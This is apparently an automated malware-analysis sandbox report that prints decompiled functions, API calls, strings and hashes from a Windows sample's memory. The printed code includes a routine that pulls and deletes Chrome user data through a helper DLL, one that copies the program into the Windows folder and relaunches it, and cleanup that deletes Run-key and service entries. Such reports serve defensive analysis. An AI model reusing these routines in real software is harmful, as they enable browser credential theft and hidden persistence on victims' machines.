0x10004c54
0x10004c6d
0x10004c71
0x10004c84
0x10004c87
0x10004c8b
0x10004c97
0x10004caa
0x10004cb5
0x10004cc0
0x10004cca
0x10004cd4
0x10004cd9
0x10004cf0
0x10004cfa
0x10004cff
0x10004c56
0x10004c5b
0x10004c60
0x10004d12
0x10004d27
0x10004d59
0x10004d6b
0x10004d7c
0x10004d81
0x10004d29
0x10004d35
0x10004d46
0x10004d4b
0x10004d4b
0x10004d8d
0x10004d9c
0x10004da2
0x10004da9
0x10004dac
0x10004db1
0x10004db4
0x10004dba
0x10004dba
0x10004dbc
0x10004dbe
0x10004dc2
0x10004dc9
0x10004dca
0x00000000
0x00000000
0x10004dd2
0x10004dd5
0x10004dd6
0x10004ddb
0x10004de0
0x10004de3
0x10004dee
0x10004df9
0x10004e06
0x10004e11
0x10004e11
0x10004e1c

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 10004C97
RegDeleteValueA.ADVAPI32(?,Group), ref: 10004CC0
RegDeleteValueA.ADVAPI32(?,Remark), ref: 10004CCA
RegDeleteValueA.ADVAPI32(?,InstallTime), ref: 10004CD4
RegCloseKey.ADVAPI32(?), ref: 10004CD9
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 10004CF0
RegDeleteValueA.ADVAPI32(?,SVP7), ref: 10004CFA
RegCloseKey.ADVAPI32(?), ref: 10004CFF
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10004D12
PathFileExistsA.SHLWAPI(?), ref: 10004D1F
strcat.MSVCRT(?,100240B4), ref: 10004D35
strcat.MSVCRT(?,Fatal,?,100240B4), ref: 10004D46
PathStripToRootA.SHLWAPI(?), ref: 10004D59
strcat.MSVCRT(?,Windows\), ref: 10004D6B
strcat.MSVCRT(?,Fatal,?,Windows\), ref: 10004D7C
strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 10004D8D
DeleteFileA.KERNEL32(?), ref: 10004D9C

Part of subcall function 100032B8: lstrlenA.KERNEL32(?), ref: 100032BE
Part of subcall function 100032B8: OpenSCManagerA.ADVAPI32(00000000,00000000,?), ref: 100032DD
Part of subcall function 100032B8: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100032F3
Part of subcall function 100032B8: DeleteService.ADVAPI32(00000000), ref: 10003300
Part of subcall function 100032B8: CloseServiceHandle.ADVAPI32(00000000), ref: 10003307
Part of subcall function 100032B8: CloseServiceHandle.ADVAPI32(00000000), ref: 1000330E

#537.MFC42(?,?), ref: 10004DD6

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

Part of subcall function 10004AFD: __EH_prolog.LIBCMT ref: 10004B02
Part of subcall function 10004AFD: GetCurrentProcess.KERNEL32(00000100,?,75D6F420), ref: 10004B14
Part of subcall function 10004AFD: SetPriorityClass.KERNEL32(00000000), ref: 10004B1B
Part of subcall function 10004AFD: GetCurrentThread.KERNEL32 ref: 10004B23
Part of subcall function 10004AFD: SetThreadPriority.KERNEL32(00000000), ref: 10004B2A
Part of subcall function 10004AFD: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10004B55
Part of subcall function 10004AFD: GetCurrentProcessId.KERNEL32 ref: 10004B5B
Part of subcall function 10004AFD: OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10004B68
Part of subcall function 10004AFD: QueryFullProcessImageNameA.KERNEL32(00000000,00000000,?,?), ref: 10004B82
Part of subcall function 10004AFD: SetFileAttributesA.KERNEL32(?,00000080), ref: 10004B94
Part of subcall function 10004AFD: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 10004BA6
Part of subcall function 10004AFD: #537.MFC42(10024018), ref: 10004BB4
Part of subcall function 10004AFD: #924.MFC42(?,?,?,10024018), ref: 10004BCB
Part of subcall function 10004AFD: #922.MFC42(?,00000000,?,?,?,?,10024018), ref: 10004BDD
Part of subcall function 10004AFD: #858.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004BEA
Part of subcall function 10004AFD: #800.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004BF6
Part of subcall function 10004AFD: #800.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004C01
Part of subcall function 10004AFD: wsprintfA.USER32 ref: 10004C15
Part of subcall function 10004AFD: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 10004C32
Part of subcall function 10004AFD: ExitProcess.KERNEL32 ref: 10004C39

GetVersionExA.KERNEL32(?), ref: 10004DF9
ExitProcess.KERNEL32 ref: 10004E1C

Strings

Fatal, xrefs: 10004D40, 10004D76
.key, xrefs: 10004D4B
SVP7, xrefs: 10004CF2
.key, xrefs: 10004D81
SYSTEM\CurrentControlSet\Services, xrefs: 10004C68
Group, xrefs: 10004CB8
Remark, xrefs: 10004CC2
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10004CEA
Qh?, xrefs: 10004C7E
Windows\, xrefs: 10004D65
cmd.exe, xrefs: 10004DA2
InstallTime, xrefs: 10004CCC
Vwxyab Defghijk, xrefs: 10004C56, 10004CA3

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: DeleteProcess$Openstrcat$CloseFileServiceValue$#800CurrentPath$#537ExitH_prologHandleNamePriorityThread$#858#922#924AttributesChangeClassCreateExecuteExistsFirstFolderFullImageManagerModuleNotifyProcess32QueryRootShellSnapshotSpecialStripToolhelp32Versionlstrlenwsprintf
String ID: .key$.key$Fatal$Group$InstallTime$Qh?$Remark$SVP7$SYSTEM\CurrentControlSet\Services$Software\Microsoft\Windows\CurrentVersion\Run$Vwxyab Defghijk$Windows\$cmd.exe
API String ID: 3434331198-526208570
Opcode ID: 1867a8febb5c0849909072d56d8dc3a03379e6a581c87861b6b34e08ae94c125
Instruction ID: 2d49b519eab496d8d4c90e7be8a998e4a40021f6c04efe91aa34bbdc91f5dab9
Opcode Fuzzy Hash: 1867a8febb5c0849909072d56d8dc3a03379e6a581c87861b6b34e08ae94c125
Instruction Fuzzy Hash: 9B411FB1940218FBEB21EBA0DD89EDE7BBDFF04344F524096F604A6111DB31AA898B55

Uniqueness

Uniqueness Score: -1.00%

Function 1000143E, Relevance: 57.9, APIs: 18, Strings: 15, Instructions: 132
stringlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000143E(intOrPtr __ecx, void* __eflags, void* __fp0) {
				struct HINSTANCE__* _t33;
				int _t34;
				_Unknown_base(*)()* _t45;
				int _t46;
				void* _t52;
				int _t53;
				int _t57;
				void* _t69;
				intOrPtr* _t74;
				intOrPtr _t79;
				long _t84;
				void* _t85;
				void* _t88;
				void* _t100;

				_t100 = __fp0;
				E100158AC(E1001A070, _t88);
				_push(__ecx);
				_push(__ecx);
				_t79 = __ecx;
				 *((intOrPtr*)(_t88 - 0x14)) = __ecx;
				E1000BE8B(__ecx,  *(_t88 + 8));
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x1001b3e0;
				_t69 = LocalAlloc(0x40, 0x400);
				 *_t69 = 0xd6;
				_t33 = LoadLibraryA("CHROMEUSERINFO.dll");
				 *(_t88 + 8) = _t33;
				if(_t33 == 0) {
					_t34 = strlen("CHROME_UNKNOW");
					_t27 = _t69 + 1; // 0x1
					memcpy(_t27, "CHROME_UNKNOW", _t34 + 1);
					_push("CHROME_UNKNOW");
					L11:
					_t84 = strlen() + 2;
					L12:
					_t85 = LocalReAlloc(_t69, _t84, 0x42);
					_push(LocalSize(_t85));
					_push(_t85);
					E1000BECD(_t79, _t100);
					LocalFree(_t85);
					 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
					return _t79;
				}
				 *((intOrPtr*)(_t79 + 0xc)) = GetProcAddress(_t33, "fnGetChromeUserInfo");
				_t45 = GetProcAddress( *(_t88 + 8), "fnDeleteChromeUserInfo");
				_t74 =  *((intOrPtr*)(_t79 + 0xc));
				 *(_t79 + 0x10) = _t45;
				if(_t74 == 0 || _t45 == 0) {
					_t46 = strlen("CHROME_UNKNOW");
					_t26 = _t69 + 1; // 0x1
					memcpy(_t26, "CHROME_UNKNOW", _t46 + 1);
					_push("CHROME_UNKNOW");
					goto L11;
				} else {
					 *(_t88 + 8) =  *(_t88 + 8) & 0x00000000;
					 *(_t88 - 0x10) =  *(_t88 - 0x10) & 0x00000000;
					_t52 =  *_t74(_t88 + 8, _t88 - 0x10);
					if(_t52 != 0) {
						if(_t52 != 5) {
							_t53 = strlen("CHROME_UNKNOW");
							_t25 = _t69 + 1; // 0x1
							memcpy(_t25, "CHROME_UNKNOW", _t53 + 1);
							_push("CHROME_UNKNOW");
						} else {
							_t57 = strlen("CHROME_NO_DATA");
							_t24 = _t69 + 1; // 0x1
							memcpy(_t24, "CHROME_NO_DATA", _t57 + 1);
							_push("CHROME_NO_DATA");
						}
						goto L11;
					} else {
						_t17 = _t69 + 1; // 0x1
						memcpy(_t17,  *(_t88 + 8),  *(_t88 - 0x10) + 1);
						_t84 =  *(_t88 - 0x10) + 1;
						if( *(_t88 + 8) != 0) {
							 *(_t79 + 0x10)(_t88 + 8);
						}
						goto L12;
					}
				}
			}

0x1000143e
0x10001443
0x10001448
0x10001449
0x1000144d
0x10001452
0x10001455
0x1000145a
0x10001465
0x10001471
0x10001478
0x1000147b
0x10001483
0x10001486
0x1000157a
0x10001582
0x1000158b
0x10001591
0x10001596
0x100015a2
0x100015a3
0x100015ad
0x100015b6
0x100015b7
0x100015ba
0x100015c0
0x100015ce
0x100015d6
0x100015d6
0x1000149f
0x100014a5
0x100014a7
0x100014aa
0x100014af
0x10001557
0x1000155f
0x10001568
0x1000156e
0x00000000
0x100014bd
0x100014bd
0x100014c1
0x100014cd
0x100014d3
0x1000150a
0x10001534
0x1000153c
0x10001545
0x1000154b
0x1000150c
0x10001511
0x10001519
0x10001522
0x10001528
0x10001528
0x00000000
0x100014d5
0x100014da
0x100014e1
0x100014f1
0x100014f4
0x100014fe
0x10001501
0x00000000
0x100014f4
0x100014d3

APIs

__EH_prolog.LIBCMT ref: 10001443

Part of subcall function 1000BE8B: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,100081F1,1000BE34,00000000,?,1000BE34,?), ref: 1000BEAA

LocalAlloc.KERNEL32(00000040,00000400,?), ref: 1000146B
LoadLibraryA.KERNEL32(CHROMEUSERINFO.dll), ref: 1000147B
GetProcAddress.KERNEL32(00000000,fnGetChromeUserInfo), ref: 10001498
GetProcAddress.KERNEL32(?,fnDeleteChromeUserInfo), ref: 100014A5
memcpy.MSVCRT ref: 100014E1
strlen.MSVCRT ref: 10001511
memcpy.MSVCRT ref: 10001522
strlen.MSVCRT ref: 10001557
memcpy.MSVCRT ref: 10001568
strlen.MSVCRT ref: 1000157A
memcpy.MSVCRT ref: 1000158B
strlen.MSVCRT ref: 10001596
LocalReAlloc.KERNEL32(00000000,00000002,00000042), ref: 100015A7
LocalSize.KERNEL32 ref: 100015B0
LocalFree.KERNEL32(00000000,00000000,00000000), ref: 100015C0

Strings

CHROME_UNKNOW, xrefs: 10001552
CHROME_UNKNOW, xrefs: 1000153F
fnGetChromeUserInfo, xrefs: 10001492
CHROME_UNKNOW, xrefs: 10001562
CHROME_UNKNOW, xrefs: 10001575
CHROME_UNKNOW, xrefs: 10001585
CHROME_UNKNOW, xrefs: 1000154B
CHROME_NO_DATA, xrefs: 1000150C
CHROME_UNKNOW, xrefs: 1000152F
CHROME_UNKNOW, xrefs: 1000156E
CHROME_UNKNOW, xrefs: 10001591
CHROME_NO_DATA, xrefs: 1000151C
CHROME_NO_DATA, xrefs: 10001528
CHROMEUSERINFO.dll, xrefs: 10001473
fnDeleteChromeUserInfo, xrefs: 1000149A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Localmemcpystrlen$AddressAllocProc$CreateEventFreeH_prologLibraryLoadSize
String ID: CHROMEUSERINFO.dll$CHROME_NO_DATA$CHROME_NO_DATA$CHROME_NO_DATA$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$CHROME_UNKNOW$fnDeleteChromeUserInfo$fnGetChromeUserInfo
API String ID: 2454334723-1566929351
Opcode ID: bb66388a5eb6541a9836db22c15a0eff3bed7303f7bc644bfceb2d9b5d2c068c
Instruction ID: 1605a422ca2521bb505cd1dd82d3a0546573d3d09c85e843f015981eac705431
Opcode Fuzzy Hash: bb66388a5eb6541a9836db22c15a0eff3bed7303f7bc644bfceb2d9b5d2c068c
Instruction Fuzzy Hash: 664162B1900615FBEB15DFA0DCD8EEA7BA8FB48392B508116FE0AD6100DB34E6058B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B482, Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 166
stringfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E1000B482() {
				long _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v788;
				void* __edi;
				void* _t35;
				int _t43;
				char* _t53;
				signed int _t87;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t100;
				void* _t101;

				_t87 = 0x40;
				_t95 =  &_v527;
				_v528 = 0;
				memset(_t95, 0, _t87 << 2);
				_t101 = _t100 + 0xc;
				_t96 = _t95 + _t87;
				asm("stosw");
				asm("stosb");
				GetModuleFileNameA(0,  &_v528, 0x104);
				_t35 = OpenProcess(0x1f0fff, 0, GetCurrentProcessId());
				_v8 = 0x104;
				 *0x10027270(_t35, 0,  &_v528,  &_v8);
				PathStripPathA( &_v528);
				 *0x100273bc(0,  &_v268, 0x1c, 0);
				 *0x100273bc(0,  &_v788, 0x1c, 0);
				_t43 = PathFileExistsA( &_v268);
				_push( &_v268);
				if(_t43 == 0) {
					PathStripToRootA();
					strcat( &_v268, "Windows\\");
					strcat( &_v268,  &_v528);
					_t101 = _t101 + 0x10;
					PathStripToRootA( &_v788);
					_push("Windows\\");
					_t53 =  &_v788;
				} else {
					PathAddBackslashA();
					PathAddBackslashA( &_v788);
					_push( &_v528);
					_t53 =  &_v268;
				}
				strcat(_t53, ??);
				if(PathFileExistsA( &_v268) == 0) {
					if( *0x100275a8 == 1) {
						_push(0);
						_t99 = E1000CCF9(0, 0, E10005745(_t96, 0x10027174), 0, 0, 0);
						WaitForSingleObject(_t99, 0xffffffff);
						CloseHandle(_t99);
					}
					strcat( &_v788, "nw_elf.dll");
					CopyFileA("nw_elf.dll",  &_v788, 0);
					if(CopyFileA( &_v528,  &_v268, 0) != 0) {
						if( *0x1002714c == 1) {
							E1000343E();
						}
						SetFileAttributesA( &_v528,  *0x10027406 & 0x0000ffff);
						SetFileAttributesA( &_v268,  *0x10027406 & 0x0000ffff);
						ShellExecuteA(0, 0,  &_v268, 0, 0, 0);
						ExitProcess(0);
					}
				}
				SetFileAttributesA( &_v528,  *0x10027406 & 0x0000ffff);
				if( *0x1002759c == 1) {
					E100038D7();
				}
				E1000B254();
				return 0;
			}

0x1000b492
0x1000b495
0x1000b49b
0x1000b4a6
0x1000b4a6
0x1000b4a6
0x1000b4a8
0x1000b4aa
0x1000b4b4
0x1000b4c7
0x1000b4d0
0x1000b4dd
0x1000b4ea
0x1000b4fb
0x1000b50c
0x1000b519
0x1000b527
0x1000b528
0x1000b552
0x1000b560
0x1000b573
0x1000b578
0x1000b582
0x1000b584
0x1000b589
0x1000b52a
0x1000b52a
0x1000b537
0x1000b543
0x1000b544
0x1000b544
0x1000b590
0x1000b5a6
0x1000b5b3
0x1000b5b5
0x1000b5ce
0x1000b5d3
0x1000b5da
0x1000b5da
0x1000b5ec
0x1000b600
0x1000b61d
0x1000b626
0x1000b628
0x1000b628
0x1000b63c
0x1000b651
0x1000b663
0x1000b66a
0x1000b66a
0x1000b61d
0x1000b67f
0x1000b68c
0x1000b68e
0x1000b68e
0x1000b693
0x1000b69e

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 1000B4B4
GetCurrentProcessId.KERNEL32 ref: 1000B4BA
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000B4C7
QueryFullProcessImageNameA.KERNEL32(00000000,00000000,?,1000BE6D), ref: 1000B4DD
PathStripPathA.SHLWAPI(?), ref: 1000B4EA
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000B4FB
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000B50C
PathFileExistsA.SHLWAPI(?), ref: 1000B519
PathAddBackslashA.SHLWAPI(?), ref: 1000B52A
PathAddBackslashA.SHLWAPI(?), ref: 1000B537
PathStripToRootA.SHLWAPI(?), ref: 1000B552
strcat.MSVCRT(?,Windows\), ref: 1000B560
strcat.MSVCRT(?,?,?,Windows\), ref: 1000B573
PathStripToRootA.SHLWAPI(?), ref: 1000B582
strcat.MSVCRT(?,Windows\), ref: 1000B590
PathFileExistsA.SHLWAPI(?), ref: 1000B59E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,00000000), ref: 1000B5D3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000B5DA
strcat.MSVCRT(?,nw_elf.dll), ref: 1000B5EC
CopyFileA.KERNEL32(nw_elf.dll,?,00000000), ref: 1000B600
CopyFileA.KERNEL32(?,?,00000000), ref: 1000B615
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000B63C
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000B651
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 1000B663
ExitProcess.KERNEL32 ref: 1000B66A
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000B67F

Part of subcall function 100038D7: __EH_prolog.LIBCMT ref: 100038DC
Part of subcall function 100038D7: memset.MSVCRT ref: 100038F9
Part of subcall function 100038D7: GetModuleFileNameA.KERNEL32(00000000,?,000000FF,?,?,750DCBB0,00000000), ref: 1000396F
Part of subcall function 100038D7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(10023508,?), ref: 10003981
Part of subcall function 100038D7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10003999
Part of subcall function 100038D7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 100039BE
Part of subcall function 100038D7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 100039CA
Part of subcall function 100038D7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(-00000001), ref: 100039E4

Strings

Windows\, xrefs: 1000B584
nw_elf.dll, xrefs: 1000B5FB
nw_elf.dll, xrefs: 1000B5E6
Windows\, xrefs: 1000B55A
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000B48B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Path$File$V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Processstrcat$AttributesNameStrip$??0?$basic_string@??1?$basic_string@BackslashCopyD@1@@ExistsFolderModuleRootSpecial$?c_str@?$basic_string@CloseCurrentExecuteExitFullH_prologHandleImageObjectOpenQueryShellSingleWaitmemset
String ID: Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$Windows\$Windows\$nw_elf.dll$nw_elf.dll
API String ID: 3763517176-1124746331
Opcode ID: 812f4b5122eb48aa6c676566d564c4a4f72f110b9f96ade8f5f4061a965f3082
Instruction ID: 1cb22646475afc3ba5b170205b988ba40148a171a816dc1201e8fde3ab410fb2
Opcode Fuzzy Hash: 812f4b5122eb48aa6c676566d564c4a4f72f110b9f96ade8f5f4061a965f3082
Instruction Fuzzy Hash: 0851FDB680122CEFEB25DBA0CCC9EEA776CFB04345F100596F619D2051EB749E898F61

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACCE, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040ACCE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x44f5d0; // 0x8e7de579
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E004271DA(E004398DF, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E0040A45B, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E00427892( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E004277B0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x400000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E0040A471(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E0040A521(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E0040A557(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E0040AB64(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E0040AA97( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E0042569C(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0040ACED
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040AD0E
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0040AD1F
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD55
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD5D
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0040AD71
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD95
ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040AD9B
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040ADD4
GetVersion.KERNEL32 ref: 0040ADE9
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0040AE0E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0040AE33
_sscanf.LIBCMT ref: 0040AE53
ConvertDefaultLocale.KERNEL32(?), ref: 0040AE88
ConvertDefaultLocale.KERNEL32(74B04EE0), ref: 0040AE8E
RegCloseKey.ADVAPI32(?), ref: 0040AE9D
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040AEAD
EnumResourceLanguagesA.KERNEL32 ref: 0040AEC8
ConvertDefaultLocale.KERNEL32(?), ref: 0040AEF9
ConvertDefaultLocale.KERNEL32(74B04EE0), ref: 0040AEFF
_memset.LIBCMT ref: 0040AF19

Strings

GetSystemDefaultUILanguage, xrefs: 0040AD5F
GetUserDefaultUILanguage, xrefs: 0040AD16
kernel32.dll, xrefs: 0040AD00
Control Panel\Desktop\ResourceLocale, xrefs: 0040AE01
ntdll.dll, xrefs: 0040AEA8

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

